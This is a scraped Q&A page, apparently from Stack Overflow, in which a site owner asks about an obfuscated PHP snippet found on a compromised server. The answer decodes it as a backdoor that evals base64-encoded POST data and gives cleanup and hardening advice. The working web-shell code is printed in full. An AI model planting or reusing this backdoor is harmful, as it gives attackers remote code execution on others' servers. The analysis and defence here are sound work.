php - Trying to decode a virus -


my server attacked, , i've been trying research how , why happening.

i have found similar pattern in virus files looks - far can tell it's trying run specific file?

has seen this, , how should interpret it? grabbing individual characters based on $sf string?

<?php  $sf = "pct4ba6odse_"; $s21 = strtolower($sf[4] . $sf[5] . $sf[9] . $sf[10] . $sf[6] . $sf[3] . $sf[11] . $sf[8] . $sf[10] . $sf[1] . $sf[7] . $sf[8] . $sf[10]); $s22 = ${strtoupper($sf[11] . $sf[0] . $sf[7] . $sf[9] . $sf[2])}['nd335c3']; if (isset($s22)) {   eval($s21($s22)); }?> 

the variable $s21 equal base64_decode , $s22 equal $_post['nd335c3'].

whenever post request made server, executes whatever command in $_post['nd335c3']; can expect, dangerous.

i highly doubt server hacked instead website script exploited. there anywhere on site users can upload files? i've seen lot of stuff wordpress poorly coded plugins.

fixing problem

to fix problem, first delete file or section of code. may want shutdown site , put in maintenance mode until can search through , verify other files have not been modified.

once site , running, log requests made hacked file located or requests contain same post variable.

once have user sends data exploit, can check other log files , compare them same ip address , user agent. far shot use 1 computer attack. logs can see visited possibly execute attack , upload exploited file.

preventing in future

  1. don't install code find online onto site unless trust developer , believe it's secure , know release updates.
  2. set web server not have write access besides upload directory , /tmp
  3. verify uploaded files make sure expect them be.
  4. don't allow php run files uploaded to, have files downloaded static direct files. way if file has been uploaded bypasses file checks, still can't harm.

Comments

Popular posts from this blog

google chrome - Developer tools - How to inspect the elements which are added momentarily (by JQuery)? -

angularjs - Showing an empty as first option in select tag -

php - Cloud9 cloud IDE and CakePHP -